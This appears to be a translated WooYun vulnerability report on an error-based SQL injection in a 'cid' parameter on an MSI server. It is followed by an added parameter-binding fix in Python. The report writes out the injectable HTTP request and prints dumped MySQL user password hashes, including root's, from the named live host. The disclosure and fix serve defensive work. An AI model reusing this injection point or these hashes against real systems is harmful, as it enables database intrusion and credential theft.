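MSI: MySQL error-based SQL injection on another site (root)

ID: 120196
URL: http://www.wooyun.org/bug.php?action=view&id=120196
Status: Unable to contact the vendor, or the vendor actively ignored the report
Title: MSI: MySQL error-based SQL injection on another site (root)
Type: SQL injection
Vendor: MSI
Researcher (white hat): lijiejie
Submitted: 2015-06-13 12:28:00
Disclosed: 2015-07-28 12:30:00
Fixed: (not set)
Confirmed: 0000-00-00 00:00:00
Confirm Spend: -1
Tags:
Followers: 0
Favorites: 0
Researcher rating
Researcher self-assessed rank: 8
Vendor rating
Vendor-assessed rank: 8
Summary
MySQL error-based injection on another MSI site
Details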

POST /product/pages/list_ajax HTTP/1.1
Content-Length: 360
Content-Type: application/x-www-form-urlencoded
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223b4a613c9db6ea54f743f14ae1c9a457%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22220.181.109.191%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A108%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F28.0.1500.63+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1434115554%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D07644a2639b0160780b4ae0d67419fcc
Host: server.msi.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

c=server&cid=*&d=list&p=product&sk=Server+Board&sw=ajax&title=Server+Board


The cid parameter is injectable.

POC

current database:    'msi_www_db'
available databases [60]:


Dumped the mysql.user table; neither of the two users' password hashes could be cracked:

root        | <blank> | *92C1D9C9BCCE50690A8447295415750781153EED
172.16.16.% | msi_ap_user | <blank> | *F7C59E45D6D9357ABD9735D5F057B8F041CC3098


There is some chance of obtaining a webshell.

Remediation

Filter the parameter.
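
One way to apply that fix to a numeric parameter such as cid, shown next to the concatenating 'before' form. This is an added example, not code from the report or from the vendor; it uses Python's sqlite3 as an offline stand-in for MySQL, and the table, column and function names are hypothetical.

```python
import sqlite3

# Constructed sample data; the table and column names are hypothetical.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, cid INTEGER, title TEXT)")
    db.executemany("INSERT INTO product (cid, title) VALUES (?, ?)",
                   [(1, "Server Board A"), (1, "Server Board B"), (2, "Barebone C")])
    return db

def list_unsafe(db, cid):
    # 'Before': the request value is concatenated into the SQL text,
    # so whatever the client sends is parsed as part of the statement.
    sql = "SELECT title FROM product WHERE cid = " + cid + " ORDER BY id"
    return db.execute(sql).fetchall()

def parse_cid(raw):
    # Allowlist: a category id is 1 to 9 ASCII digits and nothing else.
    if not (isinstance(raw, str) and raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("invalid cid")
    return int(raw)

def list_safe(db, raw_cid):
    # 'After': validate first, then bind the value as a parameter so it
    # can only ever be treated as data.
    cid = parse_cid(raw_cid)
    return db.execute("SELECT title FROM product WHERE cid = ? ORDER BY id",
                      (cid,)).fetchall()

def handle_request(db, form):
    # Bad input gets a generic 400. Database error text is never echoed to
    # the client, because error-based injection relies on reading it there.
    try:
        rows = list_safe(db, form.get("cid", ""))
    except ValueError:
        return 400, []
    return 200, [r[0] for r in rows]

if __name__ == "__main__":
    db = make_db()
    print(handle_request(db, {"cid": "1"}))         # normal request
    print(handle_request(db, {"cid": "1 OR 1=1"}))  # constructed tampered value
    print(len(list_unsafe(db, "1 OR 1=1")))         # 'before' form returns every row
```

Because the report shows the application reaching MySQL as root, this fix is normally paired with a dedicated database account that has only the privileges the site needs.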

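Status history:
2015-06-13: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2015-07-28: The vendor has actively ignored the vulnerability; details disclosed to the public
Vendor response: (not set)
Response: Unable to contact the vendor, or the vendor actively rejected the report. Vulnerability Rank: 8 (WooYun rating)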